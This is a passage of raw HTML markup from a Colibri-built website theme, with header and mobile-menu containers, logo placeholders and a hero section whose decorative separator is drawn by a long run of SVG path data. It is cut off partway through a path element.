style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n                                    <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n                                          <!---->\n                                          <!---->\n                                          <div class=\"\">\n                                            <p>© 2022</p>\n                                          </div>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                          </div>\n                        </div>\n                        <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n                      </div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n    <div class=\"background-wrapper\">\n      <div class=\"background-layer background-layer-media-container-lg\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path 